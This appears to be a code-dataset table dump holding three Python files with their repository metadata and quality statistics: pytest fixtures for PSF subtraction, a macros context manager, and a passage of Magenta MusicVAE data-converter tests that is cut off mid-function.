hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b938f394b39f3c178c953deb61da02fc43238b30 | 2,245 | py | Python | psfsubtraction/fitpsf/tests/conftest.py | hamogu/psfsubtraction | 719f3f4da86abf1c4ba48b1b98d57d191f73188f | [
"MIT"
] | 2 | 2017-04-04T18:50:31.000Z | 2019-01-23T00:41:39.000Z | psfsubtraction/fitpsf/tests/conftest.py | hamogu/psfsubtraction | 719f3f4da86abf1c4ba48b1b98d57d191f73188f | [
"MIT"
] | 8 | 2016-06-19T23:40:25.000Z | 2019-01-11T15:56:39.000Z | psfsubtraction/fitpsf/tests/conftest.py | hamogu/psfsubtraction | 719f3f4da86abf1c4ba48b1b98d57d191f73188f | [
"MIT"
] | 3 | 2016-06-19T23:34:00.000Z | 2016-07-08T17:43:13.000Z | # Licensed under a MIT licence - see file `license`
import numpy as np
from scipy.stats import multivariate_normal
import pytest
@pytest.fixture()
def example3_3():
image = np.ma.array([[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.]],
mask=[[False, False, False],
[False, False, False],
[False, True, True]]
)
psf1 = np.ma.array([[1., 2., 3.],
[4., 5., 100.],
[7., 8., 9.]],
mask=[[False, False, False],
[False, False, True],
[False, False, False]]
)
psf2 = np.ma.array([[1., 2., 100.],
[4., 5., 6.],
[7., 8., 100.]],
mask=[[False, False, True],
[False, False, False],
[False, False, True]]
)
psfarray = np.ma.dstack((psf1, psf2))
return psfarray, image
@pytest.fixture()
def example40_40():
x, y = np.mgrid[-1:1:.05, -1:1:.05]
pos = np.empty(x.shape + (2,))
pos[:, :, 0] = x
pos[:, :, 1] = y
psf1 = multivariate_normal([0, 0.], [[2.0, 0.3], [0.3, 0.5]]).pdf(pos)
psf2 = multivariate_normal([0, 0.], [[1.0, 0.3], [0.3, 0.7]]).pdf(pos)
psf3 = multivariate_normal([0, 0.], [[1.0, 0], [0, 1.]]).pdf(pos)
psfarray = np.ma.dstack((psf1, psf2, psf3))
image = 1 * psf1 + 2 * psf2 + 3 * psf3
np.random.seed(0)
image += 0.3 * np.random.rand(*image.shape)
return psfarray, image
@pytest.fixture()
def example40_40_masked(example40_40):
image = example40_40[1]
psf = np.ma.array(example40_40[0])
# mask a couple of points
for i in range(10):
ind = np.random.choice(40, 2)
image[ind[0], ind[1]] = 1e5
image = np.ma.masked_greater(image, 1e4)
for i in range(10):
for j in range(3):
ind = np.random.choice(40, 2)
indj = np.random.choice(3)
psf[ind[0], ind[1], indj] = 1e5
psf = np.ma.masked_greater(psf, 1e4)
return psf, image
| 29.539474 | 74 | 0.444989 | 287 | 2,245 | 3.43554 | 0.25784 | 0.172414 | 0.182556 | 0.162272 | 0.457404 | 0.413793 | 0.233266 | 0.186613 | 0.064909 | 0 | 0 | 0.099855 | 0.38441 | 2,245 | 75 | 75 | 29.933333 | 0.613603 | 0.032517 | 0 | 0.298246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b93c6fe59e9799d27c66b8330ffaf6b88907c7e0 | 530 | py | Python | str_macros/context_manager.py | abramovd/str-macros | cb488ba51aacda1f528d240866b75eca8a16ee0c | [
"MIT"
] | 1 | 2017-08-12T08:15:45.000Z | 2017-08-12T08:15:45.000Z | str_macros/context_manager.py | abramovd/str-macros | cb488ba51aacda1f528d240866b75eca8a16ee0c | [
"MIT"
] | null | null | null | str_macros/context_manager.py | abramovd/str-macros | cb488ba51aacda1f528d240866b75eca8a16ee0c | [
"MIT"
] | null | null | null | from .mixins import MacrosMixin
class enabled_macros(object):
"""
Inside of this context manager macros are
enabled
"""
def __init__(self, model):
self.model = model
if not issubclass(self.model, MacrosMixin):
raise AttributeError('Model is not subclass of MacrosModelMixin')
def __enter__(self):
if issubclass(self.model, MacrosMixin):
self.model.start_macros()
return self.model
def __exit__(self, *args):
self.model.stop_macros() | 24.090909 | 77 | 0.643396 | 60 | 530 | 5.433333 | 0.533333 | 0.193252 | 0.116564 | 0.184049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.267925 | 530 | 22 | 78 | 24.090909 | 0.840206 | 0.092453 | 0 | 0 | 0 | 0 | 0.088937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9460836f40db8c1117c881b9bf03074a03da36d | 51,779 | py | Python | magenta/models/music_vae/data_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 2 | 2019-10-19T00:21:16.000Z | 2019-10-19T00:21:36.000Z | magenta/models/music_vae/data_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 1 | 2019-09-29T22:41:54.000Z | 2019-09-29T22:41:54.000Z | magenta/models/music_vae/data_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 1 | 2021-09-22T18:37:38.000Z | 2021-09-22T18:37:38.000Z | # Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for MusicVAE data library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from magenta.models.music_vae import data
import magenta.music as mm
from magenta.music import constants
from magenta.music import testing_lib
from magenta.protobuf import music_pb2
import numpy as np
import tensorflow as tf
NO_EVENT = constants.MELODY_NO_EVENT
NOTE_OFF = constants.MELODY_NOTE_OFF
NO_DRUMS = 0
NO_CHORD = constants.NO_CHORD
def filter_instrument(sequence, instrument):
filtered_sequence = music_pb2.NoteSequence()
filtered_sequence.CopyFrom(sequence)
del filtered_sequence.notes[:]
filtered_sequence.notes.extend(
[n for n in sequence.notes if n.instrument == instrument])
return filtered_sequence
class NoteSequenceAugmenterTest(tf.test.TestCase):
def setUp(self):
sequence = music_pb2.NoteSequence()
sequence.tempos.add(qpm=60)
testing_lib.add_track_to_sequence(
sequence, 0,
[(32, 100, 2, 4), (33, 100, 6, 11), (34, 100, 11, 13),
(35, 100, 17, 18)])
testing_lib.add_track_to_sequence(
sequence, 1, [(57, 80, 4, 4.1), (58, 80, 12, 12.1)], is_drum=True)
testing_lib.add_chords_to_sequence(
sequence, [('N.C.', 0), ('C', 8), ('Am', 16)])
self.sequence = sequence
def testAugmentTranspose(self):
augmenter = data.NoteSequenceAugmenter(transpose_range=(2, 2))
augmented_sequence = augmenter.augment(self.sequence)
expected_sequence = music_pb2.NoteSequence()
expected_sequence.tempos.add(qpm=60)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(34, 100, 2, 4), (35, 100, 6, 11), (36, 100, 11, 13),
(37, 100, 17, 18)])
testing_lib.add_track_to_sequence(
expected_sequence, 1, [(57, 80, 4, 4.1), (58, 80, 12, 12.1)],
is_drum=True)
testing_lib.add_chords_to_sequence(
expected_sequence, [('N.C.', 0), ('D', 8), ('Bm', 16)])
self.assertEqual(expected_sequence, augmented_sequence)
def testAugmentStretch(self):
augmenter = data.NoteSequenceAugmenter(stretch_range=(0.5, 0.5))
augmented_sequence = augmenter.augment(self.sequence)
expected_sequence = music_pb2.NoteSequence()
expected_sequence.tempos.add(qpm=120)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(32, 100, 1, 2), (33, 100, 3, 5.5), (34, 100, 5.5, 6.5),
(35, 100, 8.5, 9)])
testing_lib.add_track_to_sequence(
expected_sequence, 1, [(57, 80, 2, 2.05), (58, 80, 6, 6.05)],
is_drum=True)
testing_lib.add_chords_to_sequence(
expected_sequence, [('N.C.', 0), ('C', 4), ('Am', 8)])
self.assertEqual(expected_sequence, augmented_sequence)
def testTfAugment(self):
augmenter = data.NoteSequenceAugmenter(
transpose_range=(-3, -3), stretch_range=(2.0, 2.0))
with self.test_session() as sess:
sequence_str = tf.placeholder(tf.string)
augmented_sequence_str_ = augmenter.tf_augment(sequence_str)
augmented_sequence_str = sess.run(
[augmented_sequence_str_],
feed_dict={sequence_str: self.sequence.SerializeToString()})
augmented_sequence = music_pb2.NoteSequence.FromString(
augmented_sequence_str[0])
expected_sequence = music_pb2.NoteSequence()
expected_sequence.tempos.add(qpm=30)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(29, 100, 4, 8), (30, 100, 12, 22), (31, 100, 22, 26),
(32, 100, 34, 36)])
testing_lib.add_track_to_sequence(
expected_sequence, 1, [(57, 80, 8, 8.2), (58, 80, 24, 24.2)],
is_drum=True)
testing_lib.add_chords_to_sequence(
expected_sequence, [('N.C.', 0), ('A', 16), ('Gbm', 32)])
self.assertEqual(expected_sequence, augmented_sequence)
class BaseDataTest(object):
def labels_to_inputs(self, labels, converter):
return [data.np_onehot(l, converter.input_depth, converter.input_dtype)
for l in labels]
def assertArraySetsEqual(self, lhs, rhs):
def _np_sorted(arr_list):
return sorted(arr_list, key=lambda x: x.tostring())
self.assertEqual(len(lhs), len(rhs))
for a, b in zip(_np_sorted(lhs), _np_sorted(rhs)):
# Convert bool type to int for easier-to-read error messages.
if a.dtype == np.bool:
a = a.astype(np.int)
if b.dtype == np.bool:
b = b.astype(np.int)
np.testing.assert_array_equal(a, b)
class BaseOneHotDataTest(BaseDataTest):
def testUnsliced(self):
converter = self.converter_class(steps_per_quarter=1, slice_bars=None)
tensors = converter.to_tensors(self.sequence)
actual_unsliced_labels = [np.argmax(t, axis=-1) for t in tensors.outputs]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_unsliced_labels, converter),
tensors.inputs)
self.assertArraySetsEqual(
self.expected_unsliced_labels, actual_unsliced_labels)
def testTfUnsliced(self):
converter = self.converter_class(steps_per_quarter=1, slice_bars=None)
with self.test_session() as sess:
sequence = tf.placeholder(tf.string)
input_tensors_, output_tensors_, _, lengths_ = converter.tf_to_tensors(
sequence)
input_tensors, output_tensors, lengths = sess.run(
[input_tensors_, output_tensors_, lengths_],
feed_dict={sequence: self.sequence.SerializeToString()})
actual_input_tensors = [t[:l] for t, l in zip(input_tensors, lengths)]
actual_unsliced_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(output_tensors, lengths)]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_unsliced_labels, converter),
actual_input_tensors)
self.assertArraySetsEqual(
self.expected_unsliced_labels, actual_unsliced_labels)
def testUnslicedEndToken(self):
orig_converter = self.converter_class(
steps_per_quarter=1, slice_bars=None)
self.assertEqual(None, orig_converter.end_token)
converter = self.converter_class(
steps_per_quarter=1, slice_bars=None, add_end_token=True)
self.assertEqual(orig_converter.input_depth + 1, converter.input_depth)
self.assertEqual(orig_converter.output_depth, converter.end_token)
self.assertEqual(orig_converter.output_depth + 1, converter.output_depth)
expected_unsliced_labels = [
np.append(l, [converter.end_token])
for l in self.expected_unsliced_labels]
tensors = converter.to_tensors(self.sequence)
actual_unsliced_labels = [np.argmax(t, axis=-1) for t in tensors.outputs]
self.assertArraySetsEqual(
self.labels_to_inputs(expected_unsliced_labels, converter),
tensors.inputs)
self.assertArraySetsEqual(expected_unsliced_labels, actual_unsliced_labels)
def testSliced(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=None)
tensors = converter.to_tensors(self.sequence)
actual_sliced_labels = [np.argmax(t, axis=-1) for t in tensors.outputs]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_sliced_labels, converter),
tensors.inputs)
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
def testTfSliced(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=None)
with self.test_session() as sess:
sequence = tf.placeholder(tf.string)
input_tensors_, output_tensors_, _, lengths_ = converter.tf_to_tensors(
sequence)
input_tensors, output_tensors, lengths = sess.run(
[input_tensors_, output_tensors_, lengths_],
feed_dict={sequence: self.sequence.SerializeToString()})
actual_sliced_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(output_tensors, lengths)]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_sliced_labels, converter),
input_tensors)
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
class BaseChordConditionedOneHotDataTest(BaseOneHotDataTest):
def testUnslicedChordConditioned(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=None,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
tensors = converter.to_tensors(self.sequence)
actual_unsliced_labels = [np.argmax(t, axis=-1) for t in tensors.outputs]
actual_unsliced_chord_labels = [
np.argmax(t, axis=-1) for t in tensors.controls]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_unsliced_labels, converter),
tensors.inputs)
self.assertArraySetsEqual(
self.expected_unsliced_labels, actual_unsliced_labels)
self.assertArraySetsEqual(
self.expected_unsliced_chord_labels, actual_unsliced_chord_labels)
def testTfUnslicedChordConditioned(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=None,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
with self.test_session() as sess:
sequence = tf.placeholder(tf.string)
input_tensors_, output_tensors_, control_tensors_, lengths_ = (
converter.tf_to_tensors(sequence))
input_tensors, output_tensors, control_tensors, lengths = sess.run(
[input_tensors_, output_tensors_, control_tensors_, lengths_],
feed_dict={sequence: self.sequence.SerializeToString()})
actual_input_tensors = [t[:l] for t, l in zip(input_tensors, lengths)]
actual_unsliced_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(output_tensors, lengths)]
actual_unsliced_chord_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(control_tensors, lengths)]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_unsliced_labels, converter),
actual_input_tensors)
self.assertArraySetsEqual(
self.expected_unsliced_labels, actual_unsliced_labels)
self.assertArraySetsEqual(
self.expected_unsliced_chord_labels, actual_unsliced_chord_labels)
def testSlicedChordConditioned(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=None,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
tensors = converter.to_tensors(self.sequence)
actual_sliced_labels = [np.argmax(t, axis=-1) for t in tensors.outputs]
actual_sliced_chord_labels = [
np.argmax(t, axis=-1) for t in tensors.controls]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_sliced_labels, converter),
tensors.inputs)
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
self.assertArraySetsEqual(
self.expected_sliced_chord_labels, actual_sliced_chord_labels)
def testTfSlicedChordConditioned(self):
converter = self.converter_class(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=None,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
with self.test_session() as sess:
sequence = tf.placeholder(tf.string)
input_tensors_, output_tensors_, control_tensors_, lengths_ = (
converter.tf_to_tensors(sequence))
input_tensors, output_tensors, control_tensors, lengths = sess.run(
[input_tensors_, output_tensors_, control_tensors_, lengths_],
feed_dict={sequence: self.sequence.SerializeToString()})
actual_sliced_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(output_tensors, lengths)]
actual_sliced_chord_labels = [
np.argmax(t, axis=-1)[:l] for t, l in zip(control_tensors, lengths)]
self.assertArraySetsEqual(
self.labels_to_inputs(self.expected_sliced_labels, converter),
input_tensors)
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
self.assertArraySetsEqual(
self.expected_sliced_chord_labels, actual_sliced_chord_labels)
class OneHotMelodyConverterTest(BaseChordConditionedOneHotDataTest,
tf.test.TestCase):
def setUp(self):
sequence = music_pb2.NoteSequence()
sequence.tempos.add(qpm=60)
testing_lib.add_track_to_sequence(
sequence, 0,
[(32, 100, 2, 4), (33, 1, 6, 11), (34, 1, 11, 13),
(35, 1, 17, 19)])
testing_lib.add_track_to_sequence(
sequence, 1,
[(35, 127, 2, 4), (36, 50, 6, 8),
(71, 100, 33, 37), (73, 100, 34, 37),
(33, 1, 50, 55), (34, 1, 55, 56)])
testing_lib.add_chords_to_sequence(
sequence,
[('F', 2), ('C', 8), ('Am', 16), ('N.C.', 20),
('Bb7', 32), ('G', 36), ('F', 48), ('C', 52)])
self.sequence = sequence
# Subtract min pitch (21).
expected_unsliced_events = [
(NO_EVENT, NO_EVENT, 11, NO_EVENT,
NOTE_OFF, NO_EVENT, 12, NO_EVENT,
NO_EVENT, NO_EVENT, NO_EVENT, 13,
NO_EVENT, NOTE_OFF, NO_EVENT, NO_EVENT),
(NO_EVENT, 14, NO_EVENT, NOTE_OFF),
(NO_EVENT, NO_EVENT, 14, NO_EVENT,
NOTE_OFF, NO_EVENT, 15, NO_EVENT),
(NO_EVENT, 50, 52, NO_EVENT,
NO_EVENT, NOTE_OFF, NO_EVENT, NO_EVENT),
(NO_EVENT, NO_EVENT, 12, NO_EVENT,
NO_EVENT, NO_EVENT, NO_EVENT, 13),
]
self.expected_unsliced_labels = [
np.array(es) + 2 for es in expected_unsliced_events]
expected_sliced_events = [
(NO_EVENT, NO_EVENT, 11, NO_EVENT,
NOTE_OFF, NO_EVENT, 12, NO_EVENT),
(NO_EVENT, NO_EVENT, 12, NO_EVENT,
NO_EVENT, NO_EVENT, NO_EVENT, 13),
(NO_EVENT, NO_EVENT, NO_EVENT, 13,
NO_EVENT, NOTE_OFF, NO_EVENT, NO_EVENT),
(NO_EVENT, NO_EVENT, 14, NO_EVENT,
NOTE_OFF, NO_EVENT, 15, NO_EVENT),
(NO_EVENT, 50, 52, NO_EVENT,
NO_EVENT, NOTE_OFF, NO_EVENT, NO_EVENT)
]
self.expected_sliced_labels = [
np.array(es) + 2 for es in expected_sliced_events]
chord_encoding = mm.MajorMinorChordOneHotEncoding()
expected_unsliced_chord_events = [
(NO_CHORD, NO_CHORD, 'F', 'F',
'F', 'F', 'F', 'F',
'C', 'C', 'C', 'C',
'C', 'C', 'C', 'C'),
('Am', 'Am', 'Am', 'Am'),
(NO_CHORD, NO_CHORD, 'F', 'F',
'F', 'F', 'F', 'F'),
('Bb7', 'Bb7', 'Bb7', 'Bb7',
'G', 'G', 'G', 'G'),
('F', 'F', 'F', 'F',
'C', 'C', 'C', 'C'),
]
self.expected_unsliced_chord_labels = [
np.array([chord_encoding.encode_event(e) for e in es])
for es in expected_unsliced_chord_events]
expected_sliced_chord_events = [
(NO_CHORD, NO_CHORD, 'F', 'F',
'F', 'F', 'F', 'F'),
('F', 'F', 'F', 'F',
'C', 'C', 'C', 'C'),
('C', 'C', 'C', 'C',
'C', 'C', 'C', 'C'),
(NO_CHORD, NO_CHORD, 'F', 'F',
'F', 'F', 'F', 'F'),
('Bb7', 'Bb7', 'Bb7', 'Bb7',
'G', 'G', 'G', 'G'),
]
self.expected_sliced_chord_labels = [
np.array([chord_encoding.encode_event(e) for e in es])
for es in expected_sliced_chord_events]
self.converter_class = data.OneHotMelodyConverter
def testMaxOutputsPerNoteSequence(self):
converter = data.OneHotMelodyConverter(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=2)
self.assertEqual(2, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = 3
self.assertEqual(3, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = 100
self.assertEqual(5, len(converter.to_tensors(self.sequence).inputs))
def testIsTraining(self):
converter = data.OneHotMelodyConverter(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=2)
converter.set_mode('train')
self.assertEqual(2, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = None
self.assertEqual(5, len(converter.to_tensors(self.sequence).inputs))
def testToNoteSequence(self):
converter = data.OneHotMelodyConverter(
steps_per_quarter=1, slice_bars=4, max_tensors_per_notesequence=1)
tensors = converter.to_tensors(
filter_instrument(self.sequence, 0))
sequences = converter.to_notesequences(tensors.outputs)
self.assertEqual(1, len(sequences))
expected_sequence = music_pb2.NoteSequence(ticks_per_quarter=220)
expected_sequence.tempos.add(qpm=120)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(32, 80, 1.0, 2.0), (33, 80, 3.0, 5.5), (34, 80, 5.5, 6.5)])
self.assertProtoEquals(expected_sequence, sequences[0])
def testToNoteSequenceChordConditioned(self):
converter = data.OneHotMelodyConverter(
steps_per_quarter=1, slice_bars=4, max_tensors_per_notesequence=1,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
tensors = converter.to_tensors(
filter_instrument(self.sequence, 0))
sequences = converter.to_notesequences(tensors.outputs, tensors.controls)
self.assertEqual(1, len(sequences))
expected_sequence = music_pb2.NoteSequence(ticks_per_quarter=220)
expected_sequence.tempos.add(qpm=120)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(32, 80, 1.0, 2.0), (33, 80, 3.0, 5.5), (34, 80, 5.5, 6.5)])
testing_lib.add_chords_to_sequence(
expected_sequence, [('N.C.', 0), ('F', 1), ('C', 4)])
self.assertProtoEquals(expected_sequence, sequences[0])
class OneHotDrumsConverterTest(BaseOneHotDataTest, tf.test.TestCase):
def setUp(self):
sequence = music_pb2.NoteSequence()
sequence.tempos.add(qpm=60)
testing_lib.add_track_to_sequence(
sequence, 0,
[(35, 100, 0, 10), (44, 55, 1, 2), (40, 45, 4, 5), (35, 45, 9, 10),
(40, 45, 13, 13), (55, 120, 16, 18), (60, 100, 16, 17),
(53, 99, 19, 20)],
is_drum=True)
testing_lib.add_track_to_sequence(
sequence, 1,
[(35, 55, 1, 2), (40, 45, 25, 26), (55, 120, 28, 30), (60, 100, 28, 29),
(53, 99, 31, 33)],
is_drum=True)
self.sequence = sequence
expected_unsliced_events = [
(1, 5, NO_DRUMS, NO_DRUMS,
2, NO_DRUMS, NO_DRUMS, NO_DRUMS),
(NO_DRUMS, 1, NO_DRUMS, NO_DRUMS,
NO_DRUMS, 2, NO_DRUMS, NO_DRUMS,
160, NO_DRUMS, NO_DRUMS, 256),
(NO_DRUMS, 2, NO_DRUMS, NO_DRUMS,
160, NO_DRUMS, NO_DRUMS, 256)
]
self.expected_unsliced_labels = [
np.array(es) for es in expected_unsliced_events]
expected_sliced_events = [
(1, 5, NO_DRUMS, NO_DRUMS,
2, NO_DRUMS, NO_DRUMS, NO_DRUMS),
(NO_DRUMS, 1, NO_DRUMS, NO_DRUMS,
NO_DRUMS, 2, NO_DRUMS, NO_DRUMS),
(NO_DRUMS, 2, NO_DRUMS, NO_DRUMS,
160, NO_DRUMS, NO_DRUMS, 256)
]
self.expected_sliced_labels = [
np.array(es) for es in expected_sliced_events]
self.converter_class = data.DrumsConverter
def testMaxOutputsPerNoteSequence(self):
converter = data.DrumsConverter(
steps_per_quarter=1, slice_bars=1, max_tensors_per_notesequence=2)
self.assertEqual(2, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = 3
self.assertEqual(3, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = 100
self.assertEqual(5, len(converter.to_tensors(self.sequence).inputs))
def testIsTraining(self):
converter = data.DrumsConverter(
steps_per_quarter=1, slice_bars=1, max_tensors_per_notesequence=2)
converter.set_mode('train')
self.assertEqual(2, len(converter.to_tensors(self.sequence).inputs))
converter.max_tensors_per_notesequence = None
self.assertEqual(5, len(converter.to_tensors(self.sequence).inputs))
def testToNoteSequence(self):
converter = data.DrumsConverter(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=1)
tensors = converter.to_tensors(
filter_instrument(self.sequence, 1))
sequences = converter.to_notesequences(tensors.outputs)
self.assertEqual(1, len(sequences))
expected_sequence = music_pb2.NoteSequence(ticks_per_quarter=220)
expected_sequence.tempos.add(qpm=120)
testing_lib.add_track_to_sequence(
expected_sequence, 9,
[(38, 80, 0.5, 1.0),
(48, 80, 2.0, 2.5), (49, 80, 2.0, 2.5),
(51, 80, 3.5, 4.0)],
is_drum=True)
self.assertProtoEquals(expected_sequence, sequences[0])
class RollInputsOneHotDrumsConverterTest(OneHotDrumsConverterTest):
def labels_to_inputs(self, labels, converter):
inputs = []
for label_arr in labels:
